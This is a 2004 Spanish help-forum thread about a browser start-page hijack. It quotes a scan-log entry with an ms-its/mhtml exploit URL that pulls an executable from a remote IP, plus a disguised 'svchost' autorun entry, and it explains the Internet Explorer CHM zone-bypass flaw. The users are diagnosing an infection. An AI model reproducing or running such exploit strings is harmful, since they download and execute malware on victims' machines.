Autor Tema: pagina de inicio your-searcher.com/index  (Leído 5615 veces)

Desconectado Pertusi77

  • Junior Member
  • **
  • Mensajes: 13
pagina de inicio your-searcher.com/index
« Respuesta #10 en: 28 de Junio de 2004, 10:44:18 pm »
no es asi todo lo que me salio.. en eso que puse no hay nada que este desubicado ..si a mi tambien me parecio que era mas corto.. de todas formas si sos tan amable de decirme si en eso esta algo fuera de lugar te agradeceria mucho
 gracias
hola a todos y siempre gracias por la prediposicion de ayudar!!

Desconectado choche

  • Iniciado
  • *****
  • Mensajes: 3697
pagina de inicio your-searcher.com/index
« Respuesta #11 en: 29 de Junio de 2004, 01:39:06 am »
Lo siento pero yo no controlo esto :( no puedo decirte si esta bien o mal. Fats es el entendido.

Desconectado enredado

  • Junior Member
  • **
  • Mensajes: 74
Curiosidad con este post
« Respuesta #12 en: 04 de Julio de 2004, 05:04:57 pm »
Curioso lo que pasa con esta página del foro al cargar el post el antivirus (avp 5.0.121) salta lo siguiente:

Citar

Access to the object X:\..\..\..\cache\nnnnnn.htm is blocked. Object is possibly infected with a virus Exloit.html.mht. It is recommended to quarantine this object.


Supongo que lo hace por esto, ya que la página para justo antes de mostrarlo:

Citar

O4 - HKCU\..\Run: [cvchost] c:\windows\svchost.exe

O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://81.211.105.37/20609/online.chm::/on-line.exe


Pues eso, es solo una curiosidad. :)

Desconectado enredado

  • Junior Member
  • **
  • Mensajes: 74
Pues no era eso...
« Respuesta #13 en: 04 de Julio de 2004, 10:15:02 pm »
No era lo que puse arriba lo que hacía saltar el AV. En realidad no sé lo que es.

Cuando cargo esta segunda página no salta el AV, por lo que no es lo que puse arriba.
Guardé la página en el disco duro con imágenes y no salta al escanearla. :shock:

Enredado ya con el tema, esto más o menos es lo que he visto por ahí:

Supuestamente el exploit se aprovecha de una falla del internet explorer y la forma en que maneja la validación de código en los archivos de ayuda *.chm

Para que iexplorer visualize las ayudas, estas se invocan con protocolos varios: its://, ms-itss://, ms-its://, mhtml:// (entre otros)

El problema consiste en que Internet Explorer no aplica
correctamente la protección de zona que impide la ejecución
de código en páginas ubicadas en páginas remotas. Si se le
pasa a Internet Explorer una URL del tipo mhtml:// que apunta
a un archivo no existente, se puede forzar la ejecución de un
archivo CHM remoto que contiene código hostil y que será
ejecutado como si fuera un archivo local.

Algún virus hay que se aprovecha de la vulneravilidad.

http://www.hispasec.com/unaaldia/1993

 

Aviso Legal | Política de Privacidad | Política de Cookies

el contenido de la web se rige bajo licencia
Creative Commons License